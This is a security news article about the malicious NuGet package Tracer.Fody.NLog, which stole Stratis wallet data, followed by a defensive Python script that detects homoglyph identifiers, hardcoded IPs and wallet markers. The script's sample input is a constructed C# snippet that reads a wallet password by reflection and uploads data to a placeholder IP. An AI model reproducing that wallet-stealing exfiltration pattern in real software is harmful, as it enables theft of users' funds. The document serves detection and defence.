A sophisticated supply chain attack has been uncovered targeting .NET developers through a malicious NuGet package named Tracer.Fody.NLog. This package, which mimicked a legitimate tracing tool, was discovered by Socket.dev analysts to harbor code designed to steal cryptocurrency wallet data, specifically from Stratis wallets. The attack vector combined typosquatting with social engineering: the malicious package was published under a username nearly identical to the legitimate maintainer's, enabling it to evade detection for years.
First published in 2020, the Tracer.Fody.NLog package accumulated approximately 2,000 downloads while operating undetected. Its ability to blend in with the original package’s metadata and description allowed it to embed deeply within development pipelines and private tools. The compromise highlights a persistent threat to software development environments, where the integrity of open-source dependencies is paramount. The threat actor’s command-and-control server was reportedly located in Russia, indicating a coordinated effort to exfiltrate financial assets.
Inside the Wallet Stealing Code
The core of the malicious Tracer.Fody.NLog package’s operation lies in its clever injection into commonly used coding patterns. Security researchers identified that the malware hooks into a generic helper method named Guard.NotNull. This method is frequently employed by developers for argument validation, making it an inconspicuous location for malicious logic to reside. When this helper method processes an object containing a WalletPassword property, the embedded malware is triggered.
Leveraging reflection, the malicious code extracts the wallet password from such objects. Concurrently, it scans the victim’s system for Stratis wallet files. The primary target is the `%APPDATA%\StratisNode\stratis\StratisMain` directory, where it specifically looks for `wallet.json` files. Once these files are located, the malware reads them and truncates the contents to capture the key material. This sensitive information, together with the recovered password, is then silently exfiltrated to a hardcoded IP address belonging to a server located in Russia.
To further complicate detection and manual code review, the attackers employed homoglyphs: identifiers built with Cyrillic characters that visually resemble Latin letters, making it extremely difficult for human analysts to spot the suspicious code. This obfuscation technique, combined with the silent execution of the exfiltration routine, ensures that the compromised application appears to function normally while sensitive financial data is systematically drained from the system. The long dwell time of this malicious package, extending over five years, suggests a calculated and patient approach by the threat actors.
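The three traits described above (reflection against a WalletPassword property, a hardcoded wallet path plus wallet.json lookup, and homoglyph identifiers) are all visible in decompiled source, so they can be checked for mechanically. The following Python script is an added example, not code from Socket.dev or from the Tracer.Fody.NLog package. It runs a static triage over decompiler output: it flags identifiers that mix Unicode scripts, hardcoded IPv4 literals, and the wallet-related markers named in the article. The sample input is constructed to resemble decompiled C#, the Cyrillic letter in it is placed deliberately, and the IP address is from the RFC 5737 documentation range rather than the real command-and-control server.

```python
"""Static triage of decompiled .NET source for the traits described above.

Added example; not code from Socket.dev or from the Tracer.Fody.NLog package.
Every function takes source text and returns plain Python values so the
findings can be fed into a review tool or a CI gate.
"""
import re
import unicodedata
from collections import defaultdict

# Constructed sample input, written to resemble decompiler output. The
# identifier on the GetProperty line contains U+0430 (CYRILLIC SMALL LETTER A)
# in place of Latin 'a', the homoglyph trick the article describes. The IP
# address is a documentation range (RFC 5737), not the real C2 server.
SAMPLE_SOURCE = (
    "public static class Guard\n"
    "{\n"
    "    public static T NotNull<T>(T value, string name)\n"
    "    {\n"
    "        var p\u0430ssword = value.GetType().GetProperty(\"WalletPassword\");\n"
    "        var dir = Environment.ExpandEnvironmentVariables(\n"
    "            \"%APPDATA%\\\\StratisNode\\\\stratis\\\\StratisMain\");\n"
    "        foreach (var f in Directory.GetFiles(dir, \"wallet.json\")) { }\n"
    "        new WebClient().UploadString(\"http://203.0.113.7/collect\", payload);\n"
    "        return value;\n"
    "    }\n"
    "}\n"
)

IDENTIFIER_RE = re.compile(r"[^\W\d]\w*")          # Unicode-aware identifier tokens
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Markers taken from the article's description of the wallet-stealing routine.
WALLET_MARKERS = ("wallet.json", "StratisMain", "WalletPassword")


def script_of(ch):
    """Return the Unicode script word ('LATIN', 'CYRILLIC', ...) for a letter."""
    return unicodedata.name(ch, "UNKNOWN").split(" ", 1)[0]


def mixed_script_identifiers(source):
    """Identifiers whose letters come from more than one script.

    Returns a list of (identifier, {script: [chars]}) so a reviewer can see
    exactly which characters are the intruders.
    """
    findings = []
    for token in set(IDENTIFIER_RE.findall(source)):
        by_script = defaultdict(list)
        for ch in token:
            if ch.isalpha():
                by_script[script_of(ch)].append(ch)
        if len(by_script) > 1:
            findings.append((token, dict(by_script)))
    return findings


def hardcoded_ipv4(source):
    """IPv4 literals in the source; a hardcoded exfiltration endpoint shows up here."""
    return sorted(set(IPV4_RE.findall(source)))


def wallet_references(source):
    """Markers tied to the wallet-stealing behaviour described in the article."""
    return [m for m in WALLET_MARKERS if m in source]


def triage(source):
    """Combine the checks into one report; empty lists mean nothing was flagged."""
    return {
        "mixed_script_identifiers": mixed_script_identifiers(source),
        "hardcoded_ipv4": hardcoded_ipv4(source),
        "wallet_references": wallet_references(source),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SOURCE).items():
        print(f"{key}: {value}")
```

The mixed-script check is the one worth keeping in a pipeline: a legitimate .NET library essentially never has an identifier that mixes Latin and Cyrillic letters, so any hit is worth a human look, whereas IP literals and wallet-path strings are only strong signals in a package that has no business touching wallets.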
The implications of this attack are significant, demonstrating how easily trusted development tools can be weaponized. Routine updates to software dependencies can transform into critical security liabilities for organizations, potentially leading to substantial financial losses. The incident underscores the ongoing need for rigorous security practices in software supply chains, including enhanced dependency scanning and verification, to mitigate the risks posed by such sophisticated threats.
As the cybersecurity community continues to analyze the full scope of this campaign, developers are advised to scrutinize their project dependencies for any signs of compromise. The discovery of this particular malicious NuGet package serves as a stark reminder of the evolving tactics employed by cybercriminals targeting the software development ecosystem. Future efforts will likely focus on improving detection mechanisms and fostering greater awareness within the developer community regarding the inherent risks of relying on third-party code without adequate security vetting.